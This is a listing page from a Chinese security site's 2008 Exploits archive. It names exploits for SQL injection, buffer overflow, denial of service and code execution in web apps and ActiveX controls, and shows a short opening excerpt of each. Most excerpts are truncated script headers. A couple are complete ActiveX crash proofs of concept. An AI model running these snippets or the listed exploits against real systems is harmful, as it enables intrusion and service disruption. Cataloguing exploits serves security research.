首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
  日期:2008-07-22 12:59:39 点击:35 评论:0
#!/usr/bin/perl use IO::Socket; print q{ ----------------------------------------------- Arctic Issue Tracker v2.0.0 exploit by ldma ~ SubCode ~ use: arctic.pl [server] [dir] sample: $perl arctic.pl localhost /arctic/ --------------------------------
MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
  日期:2008-07-22 12:59:08 点击:37 评论:0
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print n; print #################### Viva IslaMe Viva IslaMe ################n; print # MojoAuto Blind SQL Injection Exploit #n; print # (mojoAuto.cgi mojo ) #n; print # Author:
MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
  日期:2008-07-22 12:58:29 点击:39 评论:0
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print n; print #################### Viva IslaMe Viva IslaMe ################n; print # MojoJobs Blind SQL Injection Exploit #n; print # (mojoJobs.cgi mojo ) #n; print # Author:
MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
  日期:2008-07-22 12:57:44 点击:40 评论:0
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print n; print #################### Viva IslaMe Viva IslaMe ################n; print # MojoPersonals Blind SQL Injection Exploit #n; print # (mojoClassified.cgi mojo ) #n; prin
MojoClassifieds 2.0 Remote Blind SQL Injection Exploit
  日期:2008-07-22 12:57:07 点击:25 评论:0
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print n; print #################### Viva IslaMe Viva IslaMe ################n; print # MojoClassifieds Blind SQL Injection Exploit #n; print # (mojoClassified.cgi mojo ) #n; pr
IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)
  日期:2008-07-22 12:56:15 点击:38 评论:0
#!/usr/bin/perl # k`sOSe - 7/21/2008 # http://secunia.com/advisories/20172 # A sploit for an ancient vuln. Just because i need # to improve my skills on windows explotation. use warnings; use strict; # CMD=c:windowssystem32calc.exe # [*] x86/alpha
HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit
  日期:2008-07-22 12:55:16 点击:21 评论:0
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print n; print #################### Viva IslaMe Viva IslaMe ################n; print # HRS Multi Blind SQL Injection Exploit #n; print # (picture_pic_bv.asp key ) #n; print # A
DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit
  日期:2008-07-22 12:54:12 点击:39 评论:0
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print n; print #################### Viva IslaMe Viva IslaMe ################n; print # DigiLeave V1.2Blind SQL Injection Exploit #n; print # (info_book.asp book_id ) #n; print
Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit
  日期:2008-07-21 11:10:49 点击:31 评论:0
#!/usr/bin/python Oracle Internet Directory 10.1.4 preauthentication Denial Of Service NOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours. Sometimes you need 2 shoots to crash OID completely. The server common
Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
  日期:2008-07-21 11:05:48 点击:69 评论:0
#!/usr/bin/python # # _____ _ _ _____ _____ _____ _____ # / ___| |_| | _ | _ | _ |_ _| # | (___| _ | [_)_/| (_) | (_) | | | # _____|_| |_|_| |_||_____|_____| |_| # C. H. R. O. O. T. SECURITY GROUP # - -- ----- --- -- -- ---- --- -- - # http://www.c
AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit
  日期:2008-07-18 15:59:14 点击:44 评论:0
#/usr/bin/perl #|+| Author: GoLd_M #--//-- # -- AlstraSoft Article Manager Pro Blind SQL Injection Exploit -- #--//-- Exploit : use strict; use LWP::Simple; print -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-n; print - AlstraS
PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
  日期:2008-07-18 15:58:10 点击:43 评论:0
html body object id=target classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F/object script language=vbscript arg1=String(10000, A) target.StartURL(arg1) /script /body /html
Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
  日期:2008-07-18 15:55:18 点击:30 评论:0
#// Bea Weblogic -- Apache Connector Remote Exploit +-1day #// Should stack break latest Windows Server 2003 address space randomization #// BIG THANKS TO #// dong-hun you(Xpl017Elz) in INetCop - for his paper #// Title: Advanced exploitation in exec
PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
  日期:2008-07-17 10:50:47 点击:86 评论:0
#!/usr/bin/perl #inphex #PHPizabi v0.848b C1 HFP1 Remote Code Execution #http://www.dz-secure.com/tools/1/WebESploit.pl.txt #if you are seeking for a partner to work on some project(s) just send an email inphex0 [ at ] gmail [ dot ] com #system/v_cro
Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC
  日期:2008-07-16 13:52:59 点击:16 评论:0
!-- Document Imaging SDK Buffer Overflow Vulnerability DoS Proof of concept Author: r0ut3r Mail : writ3r [at] gmail.com ----------------------------- -Tested on WinXP Pro SP2 Version: 10.95 Vendor : Black Ice Software Price : $999 File : biimgfrm.ocx
WinRemotePC Full+Lite 2008 r.2server Denial of Service Exploit
  日期:2008-07-16 13:52:10 点击:29 评论:0
#include stdio.h #include stdlib.h #include sys/socket.h #include sys/types.h #include netinet/in.h #include string.h #include malloc.h #include sys/stat.h #include fcntl.h #define size 30000 #define tests 35 /* ****WinRemotePC Full+Lite 2008 r.2serv
Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability
  日期:2008-07-16 13:50:59 点击:19 评论:0
--==+============================================================================+==-- --==+ Galatolo Web Manager 1.3a = XSS / Remote SQL Injection Vulnerability +==-- --==+============================================================================+
Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit
  日期:2008-07-15 10:48:40 点击:25 评论:0
Yahoo Messenger 8.1 (latest) Remote DoS Safe for Scripting, Safe for Initialize htmlbody object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670/object script language=vbscript arg1=String(517140, A) target.c arg1 /script /body/html
Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit
  日期:2008-07-14 12:13:23 点击:42 评论:0
?php /* Coded By RMx - Liz0zim BiyoSecurity.Com Coderx.org Ki zava Ki Zava :) Thanx : Crackers_Child - TR_IP - Volqan - All SQL Low3rz */ error_reporting(E_ALL); ini_set(max_execution_time,0); ini_set(default_socket_timeout,5); $desen='|value=(.*)|si
Ultrastats <= 0.2.142 (players-detail.php) Blind SQL Injection Exploit
  日期:2008-07-14 12:12:27 点击:25 评论:0
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; # # [!] Discovered.: DNX # [!] Vendor.....: http://www.shooter-szene.de | http://www.ultrastats.org # [!] Detected...: 29.06.2008 # [!] Reported...: 04.07.2008 # [!] Response...: xx.xx.2008 # # [!
共637页/12733条记录 首页 上一页 [514] [515] [516] 517 [518] [519] [520] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved